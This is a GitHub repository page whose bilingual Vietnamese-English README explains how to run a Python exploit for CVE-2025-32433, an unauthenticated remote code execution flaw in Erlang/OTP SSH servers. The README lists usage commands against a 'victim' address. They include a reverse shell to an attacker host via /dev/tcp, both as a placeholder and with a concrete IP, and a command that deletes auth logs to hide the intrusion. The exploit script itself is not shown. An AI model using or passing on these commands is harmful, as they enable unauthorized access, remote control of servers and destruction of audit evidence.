Skip to content
/ CVE_2025_32433_exploit Public

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling

yuri08loveelaina.github.io
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Yuri08loveElaina/CVE_2025_32433_exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 
elaina_cve_2025_32433.py
elaina_cve_2025_32433.py
 
 

Repository files navigation

##VIETNAMESE##

  • 🧠 Gợi ý sử dụng:
  • Kiểm tra tệp tạo:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'touch /tmp/pwned_by_elaina'

  • Reverse shell:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

  • 🔏 Ghi chú:

Script không cần SSH key hoặc mật khẩu.

Hoạt động trên các phiên bản Erlang/OTP SSH server bị ảnh hưởng (< 27.3.3, < 26.2.5.11, < 25.3.2.20).

Gửi đúng định dạng SSH binary message theo RFC4253.

  • 🧱 Giải nghĩa:

  • touch: lệnh trong Unix/Linux dùng để tạo file trống.

  • /tmp/pwned_by_elaina: đường dẫn đến file cần tạo trong thư mục /tmp, nơi mà hầu hết hệ thống Linux đều cho phép ghi.

  • 🧪 Mục đích dùng trong exploit:

  • Khi bạn chạy payload:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'touch /tmp/pwned_by_elaina' thì:

  • ✅ Nếu khai thác thành công, trên máy nạn nhân sẽ xuất hiện file:

/tmp/pwned_by_elaina 🚫 Nếu không xuất hiện file này, có thể payload bị chặn hoặc máy không bị ảnh hưởng.

  • 🔎 Kiểm tra kết quả:

  • Nếu bạn có shell vào máy nạn nhân, kiểm tra:

ls -l /tmp/pwned_by_elaina

📌 Tùy chọn khác:

  • Bạn có thể thay bằng bất kỳ lệnh nào bạn muốn, ví dụ:

  • Gửi reverse shell:

bash -i >& /dev/tcp/10.10.14.6/4444 0>&1

  • Xóa file log:

rm -rf /var/log/auth.log

ENGLISH

  • ##🧠 Usage suggestions:##

  • Check the generated file:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'touch /tmp/pwned_by_elaina'

  • Reverse shell:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

  • ##🔏 Note: ##

The script does not require an SSH key or password.

Works on affected Erlang/OTP SSH server versions (< 27.3.3, < 26.2.5.11, < 25.3.2.20).

Send the correct SSH binary message format according to RFC4253.

  • 🧱 Explanation:

  • touch: command in Unix/Linux used to create an empty file.

  • /tmp/pwned_by_elaina: path to the file to create in the /tmp directory, where most Linux systems allow writing.

  • 🧪 Purpose of use in exploit:

  • When you run the payload:

python3 elaina_cve_2025_32433.py 192.168.1.10 22 'touch /tmp/pwned_by_elaina' then:

  • ✅ If the exploit is successful, the file will appear on the victim's machine:

/tmp/pwned_by_elaina 🚫 If this file does not appear, the payload may be blocked or the machine is not affected.

  • 🔎 Check the result:

  • If you have a shell on the victim machine, check:

ls -l /tmp/pwned_by_elaina

📌 Other options:

  • You can replace it with any command you want, for example:

  • Send a reverse shell:

bash -i >& /dev/tcp/10.10.14.6/4444 0>&1

  • Delete the log file:

rm -rf /var/log/auth.log

About

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling

yuri08loveelaina.github.io

Topics

cve cve-scanning cve-exploit cve-2025 cve-2025-32433 cve-2025-32433-exploit

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages